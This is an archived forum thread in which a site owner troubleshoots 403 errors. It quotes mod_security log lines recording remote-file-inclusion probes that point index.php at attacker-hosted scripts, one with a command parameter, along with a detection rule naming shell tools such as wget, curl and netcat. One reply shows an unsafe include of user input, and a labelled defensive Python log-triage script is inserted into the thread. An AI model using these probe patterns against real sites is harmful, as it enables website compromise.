View Full Version : HELP needed.


ame235
05-22-2007, 02:01 PM
I've been having several problems with 403 (access forbidden) errors on my website for months. Changing my database values is becoming a nightmare, either with Pixelpost 1.6 or phpBB 2.22 (I can post comments and add topics, and spammers can too... lol, but I can't change settings or anything else...)


Looking at my log files, I noticed these entries:

[Tue May 22 08:06:36 2007] [error] [client 193.138.204.213] mod_security: Access denied with code 403. Pattern match "!/imp/login\\\\.php" at HEADER("Referer") [id "300018"] [rev "3"] [msg "Generic PHP code injection protection via ARGS"] [severity "CRITICAL"] [hostname "www.ame235.com"] [uri "/index.php?x=http://supercraw.altervista.org/SuPrEmO.txt?"]
[Tue May 22 08:46:15 2007] [error] [client 201.50.202.225] mod_security: Access denied with code 403. Pattern match "!/imp/login\\\\.php" at HEADER("Referer") [id "300018"] [rev "3"] [msg "Generic PHP code injection protection via ARGS"] [severity "CRITICAL"] [hostname "www.ame235.com"] [uri "/index.php?x=http://www.servan.com.br/fotos/scninbox.txt?"]
[Tue May 22 10:53:50 2007] [error] [client 189.0.73.207] mod_security: Access denied with code 403. Pattern match "(\\\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\\\:/|(cmd|command)=(cd|\\\\;|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |lwp-(download|request|mirror|rget) |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\\\+\\\\+ |\\\\./|whoami|killall |rm \\\\-[a-z|A-Z]))" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.ame235.com"] [uri "http://www.ame235.com/index.php?x=http://www.sirensounddesign.com/mechupa.henrique?&cmd=id"]


Those txt files contain PHP code in JavaScript style... dunno much about coding, but I can understand there are functions to mod permissions (CHMOD)...
and list files and... and...

So this seems to be dangerous code trying to execute on my website.
This is an error log that tells me the code has been refused. Okay, cool.
But I mean, maybe before adding the security the code has been executed...

Could this be the source of my 403 error problem?
How can I resolve this? (The mod_security works, but I would prefer to avoid them on my own!)

Thanks for your answers...
Ame235. on Http://www.ame235.com

Dennis
05-22-2007, 02:32 PM
What I can see is that they are trying some injection code. They hope they can include their page that way. With this code this can happen:


include($_GET['x']);


This will include all the files without checking. Pixelpost, however, does check. With Pixelpost you only include template files of the type HTML. These template files have to exist in a location on your server, more specifically in a location you defined in your admin panel (if you select a template, you select a folder where the files should be). If the files are not there you get a 404, index.php not found error.
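
Added example, not part of the thread or of Pixelpost: a Python sketch that triages mod_security error-log lines in the format quoted above, separating denied requests that carry a remote URL in a query parameter (the `x=http://...` pattern) from other denied requests. The sample lines are constructed with documentation IPs and hostnames, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines modelled on the log format quoted in the thread.
SAMPLE_LOG = r'''
[Tue May 22 08:06:36 2007] [error] [client 192.0.2.10] mod_security: Access denied with code 403. Pattern match "x" at HEADER("Referer") [id "300018"] [rev "3"] [msg "Generic PHP code injection protection via ARGS"] [severity "CRITICAL"] [hostname "www.example.com"] [uri "/index.php?x=http://files.example.net/a.txt?"]
[Tue May 22 10:53:50 2007] [error] [client 198.51.100.7] mod_security: Access denied with code 403. Pattern match "y" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.example.com"] [uri "http://www.example.com/index.php?x=http://files.example.org/b?&cmd=id"]
[Tue May 22 11:00:00 2007] [error] [client 192.0.2.10] mod_security: Access denied with code 403. Pattern match "z" at POST_PAYLOAD [severity "EMERGENCY"] [hostname "www.example.com"] [uri "/admin/index.php?view=options"]
'''

CLIENT_RE = re.compile(r'\[client ([^\]]+)\]')
FIELD_RE = re.compile(r'\[(id|rev|msg|severity|hostname|uri) "([^"]*)"\]')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def parse_line(line):
    """Return a dict for one mod_security denial line, or None for other lines."""
    client = CLIENT_RE.search(line)
    if client is None or "mod_security" not in line:
        return None
    fields = dict(FIELD_RE.findall(line))
    try:
        query = urlsplit(fields.get("uri", "")).query
    except ValueError:  # malformed URI: keep the event, no parameters
        query = ""
    params = parse_qsl(query, keep_blank_values=True)
    # Parameters whose value is itself a URL are remote-include candidates.
    remote = {k: v for k, v in params if REMOTE_RE.match(v)}
    return {"client": client.group(1), "id": fields.get("id"),
            "severity": fields.get("severity"), "uri": fields.get("uri"),
            "remote_params": remote}

def triage(log_text):
    """Split denials into remote-include probes (per client) and the rest."""
    probes, other = {}, []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        if event["remote_params"]:
            probes.setdefault(event["client"], []).append(event)
        else:
            other.append(event)
    return probes, other

if __name__ == "__main__":
    probes, other = triage(SAMPLE_LOG)
    for client, events in probes.items():
        print(client, [e["remote_params"] for e in events])
    print("other denied requests:", [e["uri"] for e in other])
```

The "other" list is where a site owner would look for their own blocked requests, since those denials were not triggered by a remote URL in the query string.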

ame235
05-22-2007, 03:15 PM
So I don't need to worry about that part, Pixelpost does the trick.
Perfect.

And what about the 403 access forbidden error I get when trying to save modifications in the admin panel of Pixelpost and/or phpBB?
When the "save mods" script tries to access the MySQL DB, the 403 pops up...

Considering that I do have the right DB access data (user name, pass...)... lol
That I see comments, images, topics & everything... and also that I can add data to the DB when adding comments in Pixelpost and/or phpBB...

Any ideas?

Dennis
05-22-2007, 04:58 PM
Well it looks like a server issue to me. Please contact your hoster about that.

ame235
05-22-2007, 05:33 PM
Yeah... just what I was thinking!
I already asked him; I asked here just to be sure I was supposing right.

Anyways, THNX!